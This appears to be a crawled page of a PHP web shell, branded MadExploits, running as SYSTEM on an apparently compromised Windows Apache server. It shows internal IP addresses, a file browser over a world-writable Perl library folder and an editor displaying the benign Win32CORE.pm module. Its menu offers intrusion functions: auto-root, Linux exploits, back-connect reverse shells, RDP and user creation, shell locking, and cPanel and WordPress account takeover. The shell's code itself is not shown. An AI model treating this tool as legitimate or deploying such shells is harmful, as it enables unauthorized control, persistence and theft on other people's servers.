Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
laragon /
bin /
git /
usr /
lib /
perl5 /
core_perl /
[ HOME SHELL ]
Name
Size
Permission
Action
B
[ DIR ]
drwxrwxrwx
CORE
[ DIR ]
drwxrwxrwx
Compress
[ DIR ]
drwxrwxrwx
Data
[ DIR ]
drwxrwxrwx
Devel
[ DIR ]
drwxrwxrwx
Digest
[ DIR ]
drwxrwxrwx
Encode
[ DIR ]
drwxrwxrwx
File
[ DIR ]
drwxrwxrwx
Filter
[ DIR ]
drwxrwxrwx
Hash
[ DIR ]
drwxrwxrwx
I18N
[ DIR ]
drwxrwxrwx
IO
[ DIR ]
drwxrwxrwx
IPC
[ DIR ]
drwxrwxrwx
List
[ DIR ]
drwxrwxrwx
MIME
[ DIR ]
drwxrwxrwx
Math
[ DIR ]
drwxrwxrwx
PerlIO
[ DIR ]
drwxrwxrwx
Scalar
[ DIR ]
drwxrwxrwx
Sub
[ DIR ]
drwxrwxrwx
Sys
[ DIR ]
drwxrwxrwx
Time
[ DIR ]
drwxrwxrwx
Unicode
[ DIR ]
drwxrwxrwx
Win32API
[ DIR ]
drwxrwxrwx
auto
[ DIR ]
drwxrwxrwx
threads
[ DIR ]
drwxrwxrwx
B.pm
29.39
KB
-rw-rw-rw-
Config.pm
3.04
KB
-rw-rw-rw-
Config_git.pl
409
B
-rw-rw-rw-
Config_heavy.pl
41.67
KB
-rw-rw-rw-
Cwd.pm
20.97
KB
-rw-rw-rw-
DynaLoader.pm
25.47
KB
-rw-rw-rw-
Encode.pm
31.45
KB
-rw-rw-rw-
Errno.pm
6.54
KB
-rw-rw-rw-
Fcntl.pm
3.89
KB
-rw-rw-rw-
IO.pm
1.43
KB
-rw-rw-rw-
NDBM_File.pm
3.01
KB
-rw-rw-rw-
O.pm
4.19
KB
-rw-rw-rw-
Opcode.pm
15.98
KB
-rw-rw-rw-
POSIX.pm
19.91
KB
-rw-rw-rw-
SDBM_File.pm
3.72
KB
-rw-rw-rw-
Socket.pm
36.16
KB
-rw-rw-rw-
Storable.pm
48.75
KB
-rw-rw-rw-
Win32.pm
61.06
KB
-rw-rw-rw-
Win32CORE.pm
1.27
KB
-rw-rw-rw-
attributes.pm
15.97
KB
-rw-rw-rw-
encoding.pm
22.41
KB
-rw-rw-rw-
lib.pm
5.99
KB
-rw-rw-rw-
mro.pm
9.61
KB
-rw-rw-rw-
ops.pm
997
B
-rw-rw-rw-
re.pm
28.04
KB
-rw-rw-rw-
threads.pm
37.06
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Win32CORE.pm
package Win32CORE; $VERSION = '0.04'; # There is no reason to load this module explicitly. It will be # initialized using xs_init() when the interpreter is constructed. 1; __END__ =head1 NAME Win32CORE - Win32 CORE function stubs =head1 DESCRIPTION This library provides stubs for the functions marked as [CORE] in L<Win32>. See that document for usage information. When any of these functions are called, the full Win32 module is loaded automatically. It is preferred that callers of these functions explicitly C<use Win32;>. =head1 HISTORY Win32CORE was created to provide on cygwin those Win32:: functions that for regular win32 builds were provided by default in perl. In cygwin perl releases prior to 5.8.6, this module was standalone and had to be explicitly used. In 5.8.6 and later, it was statically linked into cygwin perl so this would no longer be necessary. As of perl 5.9.5/Win32 0.27, these functions have been moved into the Win32 module. Win32CORE provides stubs for each of the former CORE Win32:: functions that internally just load the Win32 module and call it's version, and Win32CORE is statically linked to perl for both cygwin and regular win32 builds. This will permit these functions to be updated in the CPAN Win32 module independently of updating perl. =cut
Close